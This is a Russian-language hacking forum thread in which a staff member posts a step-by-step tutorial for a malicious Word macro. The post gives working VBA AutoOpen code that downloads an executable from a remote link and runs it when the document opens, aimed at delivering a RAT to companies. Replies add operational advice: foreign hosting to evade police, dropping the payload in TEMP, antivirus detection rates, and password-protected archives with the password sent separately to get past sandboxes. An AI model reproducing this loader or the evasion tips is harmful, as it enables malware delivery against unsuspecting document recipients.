РЕКЛАМА НА ФОРУМЕ 

РЕКЛАМА НА ФОРУМЕ MultiVPN РЕКЛАМА НА ФОРУМЕ

Создаём свой макрос для загрузки вирусов в документе Word

D108

Команда форума
Сообщения
363
Реакции
113
Баллы
58
Сегодня мы будем писать свой лоадер в макросе в VB6
Будет это очень сложно:D

Для этого нам нужны:
  • Word
  • VB6
  • Скрипт
  • Сайт откуда будет загружаться наш зловред(вирус)
Начнём:
С самого начала нужно скачать и установить vb6(если вы не смогли это сделать то дальше не читайте)

Создадим новый документ Word(Думаю все знают как это сделать)

Далее зайдём во вкладку Вид и нажмём Макросы


Нам откроется меню в котором мы указываем имя макроса(любое) и нажимаем создать и у нас откроется VB

Сейчас нам надо загрузить наш файл на любой сервис с прямыми ссылками на загрузку,можно и на свой как это сделал я (Пару таких сайтов:http://files.d-lan.dp.ua/ http://files.dp.ua/)

В VB удаляем весь код и вставляем этот:
Код:
Sub AutoOpen()

Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "Прямая ссылка на загрузку файла", False
xHttp.Send

With bStrm
 .Type = 1 '//binary
 .Open
 .write xHttp.responseBody
 .savetofile "Название файла.exe", 2 '//overwrite
End With

Shell ("Название файла.exe")

End Sub
Должно получится что-то такое
upload_2018-2-27_20-37-27.png

Закрываем VB
После можно писать что угодно в самом документе.

Если вы всё сделали правильно то при открытии документа будет качаться и запускаться наш вирус(например комета)
upload_2018-2-27_20-42-14.png
Спасибо за внимание
Удачного взлома компаний отчётами
Если есть вопросы пишите сюда
Ориджинал контент
 
Сообщения
22
Реакции
4
Баллы
3
D108, Ну насчет компаний ты погарячился, потому что файлообменники украинские. Пробить откуда заливался файл на сайт будет стоить пару сотен долларов, и мусор уже будет бежать к тебе с инфой в зубах. Да и по своему опыту скажу что ооочень многие файлообменники являются недоверенными сайтами, и файл-лодырь просто блочит при загрузке. Такие вещи нужно лить на хостинги, притом зарубежные. И пару дней назад я как раз писал в чате по этой теме.

Я через лодырь делал полезную нагрузку, и перебрал уже около 20 хостингов забугорных, они робочие да, претензий нет, но когда загрузчик качает твой файл то хостинг дает ошибку. Когда на линуксе через lusk проверяешь соеденение, то оказывается что проблема именно с хостингом, сам хостинг не дает чтобы ексешные файлы качались без проблем, потому что знают что всякие умники суют туда трояны. И тут либо выход - платить за забугорный хостинг на имя васи пупкина, и качать ексешные файлы, либо напрячь жопу и перерыть все что можно чтобы найти бесплатный забугорный хостинг который будет качать без проблем. Поэтому школота сейчас набежит на этот скрипт, а потом сунет свой нос куда не надо, и такая компания посадит на бутылку чудо-хакера. Поэтому это на свой страх и риск для школоты. Тут итак одни школьники бегают, пишут по пару сообщений, качают файл и уходят, нет смысла этих бездарей учить макросам.

И еще, скрипт нужно переписать чтобы троян качался хотябы в темп. А так троян качаеться в ту же папку где находится файл ворда. Если файл ворда на робочем столе, то и ексешник туда загрузится. Нужно бить оочень тупым, чтобы не понять что это скачался вирус, и он уже гуляет по твоей системе.


Палится сам Word документ такой?
Палится, примерно 15-20/37. Это уже древний способ, его палит все что может.
 
Последнее редактирование:
OP
D108

D108

Команда форума
Сообщения
363
Реакции
113
Баллы
58
D108, Ну насчет компаний ты погарячился,
Во-первых про компании был рофл
файлообменники украинские. Пробить откуда заливался файл на сайт будет стоить пару сотен долларов, и мусор уже будет бежать к тебе с инфой в зубах. Да и по своему опыту скажу что ооочень многие файлообменники являются недоверенными сайтами, и файл-лодырь просто блочит при загрузке. Такие вещи нужно лить на хостинги, притом зарубежные. И пару дней назад я как раз писал в чате по этой теме.
Во-вторых я не призывал заливать файлы на файлообменник,я их залил на свой фтп сервак
И еще, скрипт нужно переписать чтобы троян качался хотябы в темп. А так троян качаеться в ту же папку где находится файл ворда. Если файл ворда на робочем столе, то и ексешник туда загрузится. Нужно бить оочень тупым, чтобы не понять что это скачался вирус, и он уже гуляет по твоей системе.
Если нужно ты дописать сохранение в TEMP проще простого,на данном примере я писал его для кометы(билд пропадает после открытия)
Палится, примерно 15-20/37. Это уже древний способ, его палит все что может.
Позже залью на VT,вчера не успел
 
Сообщения
2
Реакции
0
Баллы
1
Во-первых про компании был рофл

Во-вторых я не призывал заливать файлы на файлообменник,я их залил на свой фтп сервак

Если нужно ты дописать сохранение в TEMP проще простого,на данном примере я писал его для кометы(билд пропадает после открытия)

Позже залью на VT,вчера не успел
У тебя что-то сообщения клонировались
 
Сообщения
22
Реакции
4
Баллы
3
я не призывал заливать файлы на файлообменник,я их залил на свой фтп сервак
Да мне на самом деле абсолютно плевать куда школота пойдет лить файл, на фтп сервак или файлообменник, будет он у них работать или нет. Я говорил к тому что сервис нужен забугорный, это в любом случае лишняя страховка, туда не дотянется рука ни одного мусора среднего звена. А у тебя фтп тоже украинский как я вижу. Из этого следовательно вопрос. Ты кроме вот этого фтп, юзал какие-то другие зарубежные рабочие хостинги?
 
OP
D108

D108

Команда форума
Сообщения
363
Реакции
113
Баллы
58
Да мне на самом деле абсолютно плевать куда школота пойдет лить файл, на фтп сервак или файлообменник, будет он у них работать или нет. Я говорил к тому что сервис нужен забугорный, это в любом случае лишняя страховка, туда не дотянется рука ни одного мусора среднего звена. А у тебя фтп тоже украинский как я вижу. Из этого следовательно вопрос. Ты кроме вот этого фтп, юзал какие-то другие зарубежные рабочие хостинги?
Я писал статью про анонимные или забугорные файлообменники?
 
Сообщения
2
Реакции
0
Баллы
1
Во-первых про компании был рофл

Во-вторых я не призывал заливать файлы на файлообменник,я их залил на свой фтп сервак

Если нужно ты дописать сохранение в TEMP проще простого,на данном примере я писал его для кометы(билд пропадает после открытия)

Позже залью на VT,вчера не успел
Архив + пароль. Только пароль не должен быть легким, ибо у песочниц сейчас есть свой словарик и тогда вскроет и задетектит.
Пароль следует отправлять следующим письмом, т.к. если отправить пароль вместе с malware, то песочницы откроют файлы и вытянут оттуда пароли.
p.s. если мы все таки говорим о компаниях
 
Последнее редактирование:
OP
D108

D108

Команда форума
Сообщения
363
Реакции
113
Баллы
58
Архив + пароль. Только пароль не должен быть легким, ибо у песочниц сейчас есть свой словарик и тогда вскроет и задетектит.
Пароль следует отправлять следующим письмом, т.к. если отправить пароль вместе с malware, то песочницы откроют файлы и вытянут оттуда пароли.
p.s. если мы все таки говорим о компаниях
Про компании был рофл
 
Сверху